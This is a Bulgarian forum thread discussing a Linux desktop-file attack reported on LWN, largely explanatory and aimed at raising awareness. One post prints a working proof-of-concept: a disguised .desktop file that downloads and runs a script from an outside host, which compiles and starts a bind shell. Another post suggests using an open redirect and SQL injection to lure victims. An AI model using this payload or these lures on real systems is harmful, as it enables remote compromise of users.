Изпечатай

[gat3way]

Май не е толкова невероятно:

http://lwn.net/Articles/318755/
http://lwn.net/Articles/319072/

[kingfisher]

"How to write a Linux virus in 5 easy steps" is a false title. It should be called:

"How to write a text file which, when downloaded deliberately and placed into a certain location, and then double-clicked, could potentially execute code within the context of the user account that ran it."

[gat3way]

Има неща, за които съм съгласен.

Определено не е вирус, защото не отговаря на дефиницията за това, т.е не може да се самовъзпроизвежда, а се налага това да става в помощта на потребителя.

От друга страна нещо ме притесняват няколко момента, първо не се налага прикачения файл да има разширение .desktop и не се налага да е изпълним, за да може да се изпълнява какъвто и да било код с правата на потребителя. Дали ще кликваш отгоре или не е отделен въпрос.

И това gksu за което пишат е голяма недосмислица. Сега му хвърлих едно око, първо това нещо има наклонности да запомня root паролата и да не те пита повече за нея, нещо, което може да създаде много огромни главоболия ако се ползва. Освен това е написано некадърно, за нула време например открих format string бъг в него, който не е фатален, защото програмата не работи с suid привилегиии, но доказва, че е писана немарливо. Такива неща в днешни дни са рядкост:

[ANTIADMIN]

A false sense of security is worse than a lack of security.

Ето това е най-полезното от цялата простотия. Типичен малоумен блогър (сори), а кви сравнения прави с уиндоус, приличат ми на фанатиците в дира и тук - като не познаваш нещо, млъкни си и не се излагай бе теба у смешника прост.
Това май е началото на края, чета идва ред и на БСД
И за да приключа с още една мъдрост - то май уиндоус излезе по-сигурен от Убунту A false sense...

[strandvata]

//off topic

Вие току-що получихте първия албански вирус! Тъй като тук не сме много напреднали с компютрите, това е ръчен вирус! Ще ви помолим:
1 - Да изпратите същото писмо на всичките Ваши познати, които има e mail адрес.
2 - Да изтриете съдържанието на диска C

[bozho]

То хубаво "албански вирус", ама нещата, за които gat3way пише са сериозни.
 

[gat3way]

Мисля, че малко надценявате средностатистическият потребител. Дори немалка част от линукс потребителите не са много security-aware а и дори да не са, леко си вярват в утопията, че им е сигурна платформата.

Ето го примера:

http://www.gat3way.eu/abetapak.oo

Което е доста груб пример. Ако вие както мен ползвате iceweasel (firefox) и даунлоуд-натите ви файлове отиват на десктоп-а, ще забележите че това нещо ще ви попита да запишете "MSH" файл (и не знае с какво да го отвори - съжалявам че съм избрал толкова тъп пример, ма не ми се мисли креативно по въпроса). Когато браузъра ви го запише, ще видите, че иконата на този файл наподобява по-скоро на някакъв документ, отколкото на непознат файл.

Ако кликнете веднъж отгоре (щото ползвате КДЕ като мен ) след малко ще ви се появи един README файл на десктопа, който ще ви информира каква грандиозна простотия сте сътворили и до какво е довела (апропо, сама по себе си простотията е безобидна, но води до доста лоши неща - затова веднага си вижте таблицата с процесите накрая и УБИЙТЕ лошия процес, за да не се възползва случаен човек от цялата работа).


Както виждате не е особено сложно. В смисъл не е чак толкова сложно човек да се заблуди да направи такава простотия.

Иначе съм съгласен, че ако си културен човек и си съзнателен, това нещо няма да мине.

Ама е забавно де, не знаех че такива глупости могат да се случват.

[phantomlord]

Аз пък си го отворих направо с kate:

[Desktop Entry]
Exec=wget http://www.gat3way.eu/prase.txt -O /tmp/prase;chmod +x /tmp/prase;/tmp/prase
Type=Application
Icon=document

#!/bin/bash
mkdir /tmp/.ops
cd /tmp/.ops
wget http://packetstormsecurity.com/advisories/suid/bindshell.c
cc -o bs bindshell.c
echo -e "WARNING!\nTo see what you've just done, type 'nc localhost 1234' !!!\nPlease kill the bindshell process ASAP!\n" > ~/Desktop/README
./bs

Хитро...

[gat3way]

Е, разбира се, обаче ти най-малкото *знаеш* че това нещо не е наред.

Сега аз мога да развия един параноичен сценарии - примерно намира се някакъв sql injection проблем на openfmi.net, който в крайна сметка позволява манипулиране на базата им. Създавам си един проект и качвам тая глупост там, като подменям линковете на останалите проекти да сочат към тая простотия, която кръщавам "hipermiperproekt.0.4.tar.gz." да речем (с което не ТВЪРДЯ че там има такива проблеми, просто теоретично.) Някой си смъква проекта (който е с икона на архив този път) и кликва отгоре да разгледа какви файлове има вътре или пък най-малкото да го разархивира (сега друг е въпроса, че това е малоумно и че бих си създал някакъв "специален" проект, а не шибана десктоп икона).

Тогава ще бъдеш доста по-склонен да запишеш и отвориш тази глупост.

А иначе съм съгласен на 100%, че това е от нещата, които изискват предоверяване от страна на жертвите, зависи от навиците им и не е гарантирано. В някои случаи може да е по-лесно, в други да е по-трудно да ги накараш да ти се доверят.

Хм или пък нещо от сорта на това:

http://en.securitylab.ru/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=http%3a%2f%2fwww.gat3way.eu%2fabetapak.oo

securitylab.ru се очаква да е надежден източник за смъкване на каквото и да било примерно

[edmon]

тия десктоп говна са кофти....как така тая тапотия взе, че се изпълни...
някъв .оо файл ...
gat3way те май са се осъзнали нали... тва ще го разкарат...
напиши им бъг репорт
не може да е толкова тапо...
тва само КДЕ ли го прави или и ГНОМ?
НЕ не не не не мога да се стърпя...ще го постна в lwn.net...

[gat3way]

Какво да се репорт-ва след като това, което съм направил е илюстрация на нещо прочетено точно там (в lwn)

Абе има възможности за грозни изпълнения, сега като се замисля, това може да вдига едно фалшиво прокси и да промени настройките на firefox така че да се минава оттам например. Това би могло да се използва за криминални занимания

[edmon]

на КДЕ барабар с примерчето!

[Ivshti]

GNOME проверя в несъответствие между разширението и MIME типа (както тук) и предупреждава че вероятно е проблем със сигурността.

[gat3way]

И КДЕ и гном сигурно вече си ги знаят тези проблеми

Все пак браво на човека дето си ги описал в блога. Сигурно звучат като глупости, обаче наистина мисля, че дават мегдан за грозни изпълнения. Защото някакъв процент от хората няма да се замислят, като кликат по разни неща и това че ползват линукс не им е никаква панацея. Тя и без това не им е панацея, но това си е подмолно. Хора, които са свикнали с графични среди и обичат да се предоверяват, биха пострадали от такива изпълнения. А и както казах, могат да се сътворяват разни схеми свързани с XSS или SQL injection проблеми, които биха подлъгали и по-опитни потребители да се доверяват.

Обаче като цяло това също така има грандиозен потенциал да се превърне в нещо крайно преекспонирано и да се взема прекалено насериозно

Тъпото е че наскоро купихме лаптоп за жена ми и понеже тя не може да се оправя с любимата операционна система, сложихме виста. Доскоро нямах никакви наблюдения от тъпата виста, обаче като гледам, там каквото и да смъкна се задават въпроси искам ли да се инсталира, дава някаква информация за обекта, който си кликнал и така нататък. Глупава работа, да не се окаже, че вистата все пак е малко по-разумно направена среда от КДЕ да речем

[tarator]

Само да кажа как е в MacOSX, от потребителска гледна точка, не знам как го реализират. За всяко приложение свалено от Интернет операционната система помни, че е свалено от мрежата и първия път когато се опиташ да го пуснеш предупреждава, че приложението може да е опасно. Ако все пак решиш да продължиш на своя отговорност повече не получаваш предупреждения.